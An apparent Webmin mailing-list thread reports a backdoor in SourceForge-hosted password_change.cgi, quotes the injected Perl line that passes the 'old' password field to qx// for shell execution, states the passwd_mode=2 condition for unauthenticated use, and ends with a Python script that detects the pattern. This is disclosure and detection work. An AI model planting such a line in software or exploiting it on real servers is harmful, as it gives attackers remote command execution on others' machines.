From: Jamie C. <jca...@we...> - 2019-08-17 22:22:38
Yes, you're right. Fortunately that option isn't on by default.

On 17/Aug/2019 14:50 Adam Hostetler <ad...@gm...> wrote ..

To clarify my last email, you can run it without any auth cookie, and use any username and "old" password. The "new" passwords have to match so it gets that far, and passwd_mode=2 has to be set in miniserver.conf.

On Sat, Aug 17, 2019 at 5:47 PM Adam Hostetler <ad...@gm...> wrote:

From my testing you can exploit it without knowing the password or even a username.

On Sat, Aug 17, 2019 at 5:35 PM Jamie Cameron <jca...@we...> wrote:

Thanks, I'm looking into this now. I'm guessing off hand that it's not remotely exploitable without an existing login, since the password change cgi can't be run unless you're already logged in.

On Aug 17, 2019 1:29 PM, Adam Hostetler <ad...@gm...> wrote:

I believe the downloads hosted by SourceForge are compromised. They contain a backdoor in the password_change.cgi; this is related to the "0day" a few days ago. The code does not appear in the current github repo nor in any commits in the past.

Backdoor code:

    if ($wuser) {
        # Update Webmin user's password
        $enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});
        # The submitted 'old' form field is interpolated into qx//, so it is
        # run as a shell command before the password comparison can fail
        $enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);
        $perr = &acl::check_password_restrictions($in{'user'}, $in{'new1'});
        $perr && &pass_error(&text('password_enewpass', $perr));
        $wuser->{'pass'} = &acl::encrypt_password($in{'new1'});

"old" password is passed to qx, which executes it as a system command.

See https://www.reddit.com/r/netsec/comments/crk77z/0day_remote_code_execution_for_webmin/

- Forwarded by the Webmin mailing list at web...@li...
To remove yourself from this list, go to http://lists.sourceforge.net/lists/listinfo/webadmin-list
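The two facts the thread establishes are (1) the injected line interpolates the "old" form field into qx//, and (2) the unauthenticated path only exists when passwd_mode=2 is set in miniserver.conf. The following script is an added example, not Webmin project code or anything posted in the thread: it scans a password_change.cgi for a CGI parameter ($in{...}) interpolated into a qx// or backtick construct and parses miniserver.conf for passwd_mode, then combines the two into a verdict. The regexes deliberately match more than the exact quoted line (any qx delimiter, any $in{...} key), which is an assumption made here so that trivial reformatting does not hide the pattern; the sample inputs are constructed, and the file paths in the usage block are typical locations, not taken from the thread.

```python
"""Check a Webmin install for the password_change.cgi backdoor described
in the thread above (added example, not Webmin project code)."""
import re
from typing import List, Optional, Tuple

# The thread quotes the injected line as
#     &pass_error($text{'password_eold'},qx/$in{'old'}/);
# Assumption: flag any qx<delim>...$in{...} or `...$in{...}...` so that a
# different delimiter or parameter name is still caught.
_QX_RE = re.compile(r"qx\s*[/{(\[|!#][^\n]*?\$in\{")
_BACKTICK_RE = re.compile(r"`[^`\n]*\$in\{[^`\n]*`")

# Constructed sample: the backdoored block exactly as quoted in the thread.
BACKDOORED_SNIPPET = """\
if ($wuser) {
\t# Update Webmin user's password
\t$enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});
\t$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);
\t$perr = &acl::check_password_restrictions($in{'user'}, $in{'new1'});
\t$perr && &pass_error(&text('password_enewpass', $perr));
\t$wuser->{'pass'} = &acl::encrypt_password($in{'new1'});
"""

# Constructed sample of what the same block looks like without the
# injected qx// argument (assumed clean form for the comparison).
CLEAN_SNIPPET = BACKDOORED_SNIPPET.replace(",qx/$in{'old'}/", "")


def find_backdoor_lines(cgi_source: str) -> List[Tuple[int, str]]:
    """Return (line_number, stripped_line) for every line in which a CGI
    parameter is interpolated into a shell-executing construct."""
    hits = []
    for num, line in enumerate(cgi_source.splitlines(), start=1):
        if _QX_RE.search(line) or _BACKTICK_RE.search(line):
            hits.append((num, line.strip()))
    return hits


def passwd_mode(miniserver_conf: str) -> Optional[int]:
    """Parse the passwd_mode=N line from miniserver.conf text.
    Returns None when the key is absent or not an integer."""
    for raw in miniserver_conf.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if key.strip() == "passwd_mode":
            try:
                return int(value.strip())
            except ValueError:
                return None
    return None


def assess(cgi_source: str, miniserver_conf: str) -> str:
    """Combine both checks. Per the thread, the backdoored line is reachable
    with no login only when passwd_mode=2 is set in miniserver.conf."""
    if not find_backdoor_lines(cgi_source):
        return "clean"
    if passwd_mode(miniserver_conf) == 2:
        return "backdoored, reachable without login (passwd_mode=2)"
    return "backdoored, passwd_mode is not 2"


if __name__ == "__main__":
    import sys
    # Assumed typical paths; adjust for the install being checked:
    #   python3 check_webmin.py /usr/share/webmin/password_change.cgi /etc/webmin/miniserver.conf
    cgi_path, conf_path = sys.argv[1:3]
    with open(cgi_path, encoding="utf-8", errors="replace") as f:
        cgi_text = f.read()
    with open(conf_path, encoding="utf-8", errors="replace") as f:
        conf_text = f.read()
    for num, line in find_backdoor_lines(cgi_text):
        print(f"{cgi_path}:{num}: {line}")
    print(assess(cgi_text, conf_text))
```

Run against the two files and the script prints each flagged line with its number, followed by the verdict. A "clean" verdict only says the qx//backtick pattern is absent from that one file; it does not establish that the rest of a tarball matches the GitHub repository, which is the comparison Adam describes in the thread.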